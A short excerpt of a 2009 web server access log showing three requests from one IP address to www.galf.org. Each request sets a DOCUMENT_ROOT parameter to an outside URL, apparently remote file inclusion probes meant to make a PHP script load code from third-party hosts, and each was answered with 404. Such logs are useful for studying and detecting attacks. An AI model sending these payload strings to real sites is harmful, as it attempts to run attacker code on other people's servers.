207.58.163.86 - - [06/Sep/2009:20:29:08 -0700] "GET /logs/access_090309.log%20%20/e404.php?DOCUMENT_ROOT=http://www.gsg-duesseldorf.de/assets/snippets/reflect/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
207.58.163.86 - - [06/Sep/2009:20:29:19 -0700] "GET /logs/access_090223.log%20%20/e404.php?DOCUMENT_ROOT=http://www.gsg-duesseldorf.de/assets/snippets/reflect/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
207.58.163.86 - - [06/Sep/2009:20:30:01 -0700] "GET /logs/access_090309.log%20%20/e404.php?DOCUMENT_ROOT=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
